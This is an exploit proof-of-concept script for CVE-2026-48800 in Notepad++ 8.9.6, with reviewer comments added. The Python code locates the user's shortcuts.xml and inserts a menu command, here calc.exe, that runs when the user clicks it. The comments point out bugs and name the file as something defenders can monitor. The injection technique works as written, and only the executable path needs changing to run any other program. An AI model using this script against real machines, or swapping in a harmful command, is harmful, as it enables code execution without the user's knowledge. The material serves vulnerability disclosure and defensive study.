# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution via shortcuts.xml (CVE-2026-48800)
# Date: 2026-05-31
# Exploit Author: Kavin Jindal (Avyukt Security)
# Contact: https://www.linkedin.com/in/kavin-jindal/
# Vendor Homepage: https://notepad-plus-plus.org
# Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/
# Version: <= 8.9.6
# Tested on: Windows 10/11
# CVE: CVE-2026-48800
# Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-3x3f-3j39-pj3v
#
# Description:
# Notepad++ reads <Command> tags from shortcuts.xml under <UserDefinedCommands> without
# validation. An attacker with write access to %APPDATA%\Notepad++\ can inject an
# arbitrary executable path, which appears as a normal Run menu entry. When the user
# clicks the injected menu item, the arbitrary command executes under the current user
# context.
# In the following script, `calc.exe` has been used to demonstrate this vulnerability.


import os, sys
# Banner only; nothing below depends on it.
print(r'''
   ___         __   ____   ___ ____   __         _  _    ___   ___   ___   ___  
  / __\/\   /\/__\ |___ \ / _ \___ \ / /_       | || |  ( _ ) ( _ ) / _ \ / _ \ 
 / /   \ \ / /_\     __) | | | |__) | '_ \ _____| || |_ / _ \ / _ \| | | | | | |
/ /___  \ V //__    / __/| |_| / __/| (_) |_____|__   _| (_) | (_) | |_| | |_| |
\____/   \_/\__/   |_____|\___/_____|\___/         |_|  \___/ \___/ \___/ \___/                                                                                                                                        
''')
print("=====================================================================")
print("[+] A PoC for CVE 2026-48800 discovered in Notepad++.")
print("[+] Affected versions <= 8.9.6")
print("[+] Built by Kavin Jindal")
print("[+] Github: https://github.com/kavin-jindal/CVE-2026-48800-PoC")
print("=====================================================================\n")


# Locate the per-user Notepad++ config directory via %APPDATA%.
# NOTE(review): os.environ["APPDATA"] raises KeyError when the variable is
# absent, so the "not found" branch below is only reached for an *empty*
# value; a missing variable ends the script with a traceback instead of the
# friendly message. os.environ.get("APPDATA") would reach the branch.
appdata: str = os.environ["APPDATA"]
if not appdata:
    print("[!] APPDATA environment variable not found, exiting..")
    sys.exit()


# The file this script mutates. For defenders: a write to
# %APPDATA%\Notepad++\shortcuts.xml that adds a <Command> element under
# <UserDefinedCommands> is the observable artefact of this technique, which
# makes that path a useful file-integrity-monitoring target. The linked
# advisory (header comment above) covers the vendor-side mitigation.
config_path: str = os.path.join(appdata, "Notepad++", "shortcuts.xml")
existing: bool = os.path.exists(config_path)
if existing==True:
    print("[+] Found shortcut.xml at ==>", config_path)
else:
    print("shortcut.xml not found. Ensure Notepad++ is installed and has been launched atleast once.")
    sys.exit()

# NOTE(review): the read handle is never closed and no encoding is given
# (the locale default is used), so the file is re-encoded on write-back with
# whatever the platform default is. The whole file is held in memory as a
# list of lines so a single line can be inserted below.
x = open(config_path, 'r')
s: list[str] = x.readlines()

# Menu entry appended under <UserDefinedCommands>; the demo command is calc.exe.
# NOTE(review): the stray `"` after calc.exe in the element text looks like a
# typo. Whether the parser tolerates it cannot be determined from this file.
payload: str ='<Command name="Command Injection Demo" Ctrl="no" Alt="no" Shift="no" Key="0">calc.exe"</Command>\n'
injected: bool =False

# enumerate starts at 1, so s.insert(num, payload) places the new line
# directly after the first line containing the opening tag. Only the first
# match is patched; the loop exits on the first hit.
for num,i in enumerate(s, start=1):
    if '<UserDefinedCommands>' in i:
        print("\n[!] Injecting payload..")
        s.insert(num, payload)       
        injected=True
        break

        
# Substring match on the opening tag is the only validation performed; a
# file without that tag (or with it split across lines) ends here.
if not injected:
    print("\n[!] Payload injection failed.")
    sys.exit(1)

# NOTE(review): 'w' truncates the original in place with no backup copy, and
# this handle is never closed either; the buffered content is flushed only
# at interpreter exit.
y = open(config_path, 'w')
y.writelines(s)
print("\n[+] Payload injected successfully!")
print("[+] Testing: Open Notepad++ > Run > Command Injection Demo")
print("[+] Calc.exe will launch ")